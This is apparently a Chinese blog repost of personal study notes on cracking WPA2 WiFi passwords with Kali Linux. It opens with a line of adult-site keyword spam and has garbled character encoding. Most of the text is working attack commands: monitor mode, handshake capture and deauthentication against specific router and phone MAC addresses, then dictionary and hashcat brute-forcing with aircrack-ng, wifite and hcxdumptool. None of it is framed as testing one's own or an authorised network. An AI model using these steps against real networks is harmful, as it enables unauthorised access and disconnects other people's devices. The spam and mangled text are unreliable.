日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 运维知识 > windows >内容正文

windows

无线渗透学习笔记使用kali系统抓握手包以及跑字典相关

發(fā)布時(shí)間:2023/12/18 windows 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 无线渗透学习笔记使用kali系统抓握手包以及跑字典相关 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
D4:EE:07:59:CE:70 -33 5 1 0 8 130 WPA2 CCMP PSK CMCC-1024 EC:41:18:28:03:40 -66 5 0 0 6 130 WPA2 CCMP PSK Xiaomi_033F

當(dāng)前網(wǎng)卡
Current MAC: 1c:bf:ce:b6:42:06 (unknown)
Permanent MAC: 1c:bf:ce:b6:42:06 (unknown)

  • 抓握手包
    airodump-ng -c 4 --bssid EC:41:18:28:03:40 -w hach wlan0mon

開(kāi)啟監(jiān)聽(tīng)模式
airmon-ng start wlan0
查看wifi網(wǎng)卡信息
iwconfig
嗅探wifi

airodump-ng wlan0mon

攻擊
aireplay-ng -0 1 –a EC:41:18:28:03:40 -c 08:ED:B9:89:FB:B1 wlan0mon

  • -0 Deautenticate 沖突模式
    使已經(jīng)連接的合法客戶端強(qiáng)制斷開(kāi)與路由端的連接,使其重新連接。在重新連接過(guò)程中獲得驗(yàn)證數(shù)據(jù)包,從而產(chǎn)生有效 ARP request。
    如果一個(gè)客戶端連在路由端上,但是沒(méi)有人上網(wǎng)以產(chǎn)生有效數(shù)據(jù),此時(shí),即使用-3 也無(wú)法產(chǎn)生有效 ARP request。所以此時(shí)需要用-0 攻擊模式配合,-3 攻擊才會(huì)被立刻激活。
    aireplay-ng -0 10 –a -c wifi0 參數(shù)說(shuō)明:
    【-0】:沖突攻擊模式,后面跟發(fā)送次數(shù)(設(shè)置為 0,則為循環(huán)攻擊,不停的斷開(kāi)連接,客戶端無(wú)法正常上網(wǎng))
    【-a】:設(shè)置 ap 的 mac
    【-c】:設(shè)置已連接的合法客戶端的 mac。
    如果不設(shè)置-c,則斷開(kāi)所有和 ap 連接的合法客戶端。
    aireplay-ng -3 -b -h wifi0
    aireplay-ng -3 -b EC:41:18:28:03:40 -h EC:41:18:28:03:40 wifi0

沖突模式

aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0

注:使用此攻擊模式的前提是必須有通過(guò)認(rèn)證的合法的客戶端連接到路由器

  • fake count

aireplay-ng --fakeauth 0 -a EC:41:18:28:03:40 -c 1c:bf:ce:b6:42:06 wlan0mon

查看wifi設(shè)備?不可用
airmon-ng show wlan device

開(kāi)始嗅探
airmon-ng start wlan0網(wǎng)卡將從 wlan0 ->wlan0mon```

掃描wifi
airodump-ng wlan0mon

抓取握手包 handshake package

iairodump-ng -c 4 --bssid EC:41:18:28:03:40 -w hackdir wlan0mon
跑包tcpdump .cap后綴包

aircrack-ng -2 -b mac_address dic.txt resouce.cap
踢用戶

aireplya-ng -0 10 -a EC:41:18:28:03:40 -c target-wifi-mac-user wlan0mon

比如
aireplay-ng -0 10 -a EC:41:18:28:03:40 -c A2:4E:03:10:C7:73 wlan0mon
-c是用戶的手機(jī)mac地址,-a是路由器的mac也就是bssid地址

D4:EE:07:59:CE:70 -39 35 26 0 8 130 WPA2 CCMP PSK CMCC-1024 [0KEC:41:18:28:03:40 -63 19 0 0 6 130 WPA2 CCMP PSK Xiaomi_033F [0K6C:38:45:7D:33:BD -68 4 0 0 6 130 WPA2 CCMP PSK ChinaNet-vteT
  • 使用wifite
    enter wifite scan wifi and client?
    wifite ctrl+c choose number crack, all crack all
    wifite默認(rèn)字典
    vim /usr/share/dict/wordlist-probable.txt

沖突問(wèn)題解決
在虛擬機(jī)重新選擇網(wǎng)卡, 或者重啟kili或者執(zhí)行
service network-manager stop,以及
airmon-ng check kill

安裝hcxdumptool

下載源碼編譯(使用root運(yùn)行,Linux內(nèi)核版本>=4.14) https://github.com/ZerBea/hcxdumptool/archive/4.2.0.tar.gz tarf -xvf 4.2.0.tar.gz cd hcxdumptool-4.2.0 make && make install # 編譯完成后的工具均安裝在/usr/local/bin/目錄下
hcxtools
安裝依賴(lài)軟件包,解決編譯報(bào)錯(cuò) apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev #下載源碼編譯(使用root運(yùn)行) wget https://github.com/ZerBea/hcxtools/archive/4.2.0.tar.gz tar -xvf 4.2.0.tar.gz cd hcxtools-4.2.0 make && make install # 編譯完成后的工具均安裝在/usr/local/bin/目錄下。
除了使用下載方法進(jìn)行編譯外還可以使用進(jìn)行修改 源編譯.

首先復(fù)制下面文本

#清華大學(xué)源 deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free #浙江大學(xué)源 deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free #官方源 #deb http://http.kali.org/kali kali-rolling main non-free contrib #deb-src http://http.kali.org/kali kali-rolling main non-free contrib #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 #deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #東軟大學(xué) #deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib #deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib #重慶大學(xué) #deb http://http.kali.org/kali kali-rolling main non-free contrib #deb-src http://http.kali.org/kali kali-rolling main non-free contrib ————————————————

輸入命令
gedit到或者vim /etc/apt/sources.list
參考鏈接:https://blog.csdn.net/xsgjm/article/details/105847524

wifi crack hcxdumptool下載地址
https://github.com/ZerBea/hcxdumptool

跑字典
aircrack-ng -w /1.txt /root/use/cap.cap

攻擊wifi設(shè)備的標(biāo)準(zhǔn)步驟
Step 1:

airodump-ng -c <CH> -bssid <ap_mac_address> -w <wifi-show-name> irodump-ng -c 6 -bssid EC:41:18:28:03:40 -w Xiaomi_033F wlan0mon

輸入后你講看到這2個(gè)列,Station列代表的是mac地址,沒(méi)有的話,要么抓不到,要么是每用戶連接
Station: Frames ,

Step 2:

aireply-ng -0 10 -a AP_BSSID -C STATION_MAC_ADDRESS 10 is attach count, APP_BSSID IS WIFI_MAC_ADDRESS

STATION_MAC_ADDRESS IS YOU PHONE OR OTHER CLIENT MAC ADDRESSS

kali系統(tǒng)更新
apt-get upgradeupgrade all soft
apt-get update updateversion info
apt-get dist-upgradeupdate all system
跑包其它方法
EWSA 5.1.271破包工具 WIFIPR 中文漢化免安裝

字典生成的不說(shuō)了,kali有命令…
linux好久沒(méi)玩了
sudo su切換超級(jí)用戶 需要輸入系統(tǒng)密碼.
passwd在su模式下可以修改密碼
以后執(zhí)行su輸入密碼就行了
kali安裝的時(shí)候有一個(gè)設(shè)備路徑必須選擇,否則開(kāi)啟啟動(dòng)就黑屏.

關(guān)于虛擬機(jī)問(wèn)題也有很多,15藍(lán)屏,修復(fù)藍(lán)屏又導(dǎo)致另外一個(gè)問(wèn)題,反正就是一個(gè)死循環(huán)了,后面升級(jí)15搞定了.

最后關(guān)于密碼窮舉的問(wèn)題普及一下,一種就是一個(gè)一個(gè)的連接嘗試,這樣非常慢,2秒嘗試一個(gè)密碼,
這個(gè)window用python腳本就行
還有一種就是抓用戶握手包,踢下線就能抓了,但是不是什么路由器都能查看到設(shè)備,或者能踢下線的.
抓到了加密包,就需要窮舉了,速度比那個(gè)還要好一點(diǎn)

下圖可以看出來(lái)基本上看不到設(shè)備數(shù)…

抓包和基本字典測(cè)試.

hashcat64 破解

hashcat64.exe -m 25000 -a -3 -2 ?l?d 2.hccapx ?2?2?2?2?2?2?2?2
cap轉(zhuǎn)capx
aircrack-ng 文件名 -j 新文件.

最后補(bǔ)充:
kali里面如果vmtool弄不上可以重新添加cd設(shè)備,反復(fù)開(kāi)機(jī)多次成功,桌面出現(xiàn)就代表成功了.
命令行執(zhí)行的方式我試過(guò),沒(méi)效果.

總結(jié)

以上是生活随笔為你收集整理的无线渗透学习笔记使用kali系统抓握手包以及跑字典相关的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。